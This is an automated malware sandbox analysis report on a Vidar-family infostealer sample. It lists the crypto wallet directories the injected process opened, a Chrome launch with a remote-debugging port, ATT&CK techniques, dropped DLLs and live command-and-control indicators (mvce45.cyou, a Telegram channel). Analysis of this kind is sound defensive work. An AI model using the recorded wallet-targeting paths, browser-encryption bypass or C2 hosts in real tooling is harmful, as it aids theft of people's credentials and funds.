                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: Yara match File source: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR

                          Remote Access Functionality

                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Source: Yara match File source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 3.2.BitLockerToGo.exe.91ecc0.1.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6CB60C40 sqlite3_bind_zeroblob,3_2_6CB60C40
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6CB60D60 sqlite3_bind_parameter_name,3_2_6CB60D60
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6CA88EA0 sqlite3_clear_bindings,3_2_6CA88EA0
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 Create Account | 1 Extra Window Memory Injection | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 511 Process Injection | 1 DLL Side-Loading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | NTDS | 54 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 511 Process Injection | Cached Domain Credentials | 151 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph ID: 1560256, Sample: S0FTWARE.exe, Startdate: 21/11/2024, Architecture: WINDOWS, Score: 100

[2] top
    DNS/IP: [46] mvce45.cyou
    DNS/IP: [48] t.me
    DNS/IP: [50] 2 other IPs or domains
    Signature: [76] Suricata IDS alerts for network traffic
    Signature: [78] Found malware configuration
    Signature: [80] Malicious sample detected (through community Yara rule)
    Signature: [82] 11 other signatures
    Started: [9] S0FTWARE.exe
    Started: [12] msedge.exe 111 394

[9] S0FTWARE.exe
    Signature: [84] Writes to foreign memory regions
    Signature: [86] Allocates memory in foreign processes
    Signature: [88] Injects a PE file into a foreign processes
    Started: [14] BitLockerToGo.exe 145

[12] msedge.exe 111 394
    Started: [19] msedge.exe
    Started: [21] msedge.exe
    Started: [23] msedge.exe

[14] BitLockerToGo.exe 145
    DNS/IP: [56] mvce45.cyou, 49.13.32.95, 443, 49712, 49713, HETZNER-AS, DE, Germany
    DNS/IP: [58] t.me, 149.154.167.99, 443, 49711, TELEGRAM, RU, United Kingdom
    DNS/IP: [60] 127.0.0.1, unknown, unknown
    Dropped: [36] C:\ProgramData\vcruntime140.dll, PE32
    Dropped: [38] C:\ProgramData\softokn3.dll, PE32
    Dropped: [40] C:\ProgramData\nss3.dll, PE32
    Dropped: [42] 3 other files (none is malicious)
    Signature: [68] Attempt to bypass Chrome Application-Bound Encryption
    Signature: [70] Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Signature: [72] Found many strings related to Crypto-Wallets (likely being stolen)
    Signature: [74] 7 other signatures
    Started: [25] msedge.exe 2 11
    Started: [28] chrome.exe 8

[19] msedge.exe
    DNS/IP: [62] sb.scorecardresearch.com, 18.165.220.106, 443, 49793, MIT-GATEWAYS, US, United States
    DNS/IP: [64] 13.107.246.40, 443, 49820, 49821, MICROSOFT-CORP-MSN-AS-BLOCK, US, United States
    DNS/IP: [66] 20 other IPs or domains

[25] msedge.exe 2 11
    Signature: [90] Monitors registry run keys for changes
    Started: [31] msedge.exe

[28] chrome.exe 8
    DNS/IP: [52] 192.168.2.8, 138, 443, 49226, unknown, unknown
    DNS/IP: [54] 239.255.255.250, unknown, Reserved
    Started: [33] chrome.exe

[33] chrome.exe
    DNS/IP: [44] www.google.com, 172.217.21.36, 443, 49723, 49727, GOOGLE, US, United States

Source | Detection | Scanner | Label | Link
S0FTWARE.exe | 58% | ReversingLabs | Win32.Spyware.Vidar |
S0FTWARE.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://mvce45.cyoua4a7f1267effnt-Disposition: | 0% | Avira URL Cloud | safe |
https://mvce45.cyou/vcruntime140.dll | 100% | Avira URL Cloud | malware |
https://mvce45.cyouXEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8K | 0% | Avira URL Cloud | safe |
https://mvce45.cyou/ | 100% | Avira URL Cloud | malware |
https://mvce45.cyou/sT$ | 100% | Avira URL Cloud | malware |
http://madskills.com/public/xml/rss/module/trackback/reflect.Value.Slice: | 0% | Avira URL Cloud | safe |
http://postneo.com/icbm/idna: | 0% | Avira URL Cloud | safe |
https://mvce45.cyou/lE | 100% | Avira URL Cloud | malware |
https://mvce45.cyou/CDu | 100% | Avira URL Cloud | malware |
https://mvce45.cyou/Ma | 100% | Avira URL Cloud | malware |
https://mvce45.cyou/s | 100% | Avira URL Cloud | malware |
https://mvce45.cyou/000 | 100% | Avira URL Cloud | malware |
https://mvce45.cyou/b | 100% | Avira URL Cloud | malware |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | high
t.me | 149.154.167.99 | true | false | | high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
sb.scorecardresearch.com | 18.165.220.106 | true | false | | high
www.google.com | 172.217.21.36 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
mvce45.cyou | 49.13.32.95 | true | true | | unknown
sni1gl.wpc.nucdn.net | 152.199.21.175 | true | false | | high
bzib.nelreports.net | unknown | unknown | false | | high
assets.msn.com | unknown | unknown | false | | high
c.msn.com | unknown | unknown | false | | high
ntp.msn.com | unknown | unknown | false | | high
api.msn.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://mvce45.cyou/vcruntime140.dll | true | Avira URL Cloud: malware | unknown
https://t.me/fu4chmo | false | | high
https://mvce45.cyou/ | true | Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199802540894 | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                  high
                                                                                                                                                  https://mvce45.cyou/MaBitLockerToGo.exe, 00000003.00000003.2658570144.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2672447504.00000000031F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://madskills.com/public/xml/rss/module/trackback/reflect.Value.Slice:S0FTWARE.exefalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://issuetracker.google.com/161903006msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, KFIJEG.3.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://drive-daily-1.corp.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://excel.new?from=EdgeM365Shoreline5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://drive-daily-5.corp.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Schrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://anglebug.com/3078chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://anglebug.com/7553chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://anglebug.com/5375chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://mvce45.cyou/sT$BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            unknown
                                                                                                                                                                            https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://anglebug.com/5371chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/4722chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://mvce45.cyou/CDuBitLockerToGo.exe, 00000003.00000003.2169542860.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2169089850.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2168516828.00000000031D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://anglebug.com/7556chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://mvce45.cyou/000BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://chromewebstore.google.com/msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.13.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgBitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://drive-preprod.corp.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://mvce45.cyou/bBitLockerToGo.exe, 00000003.00000003.2378639595.00000000031E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://anglebug.com/6692chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://issuetracker.google.com/258207403msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://anglebug.com/3502chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/3623msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.office.com5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/3625msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://outlook.live.com/mail/0/5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://anglebug.com/3624msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://docs.google.com/presentation/Jchrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/5007chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://anglebug.com/3862chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
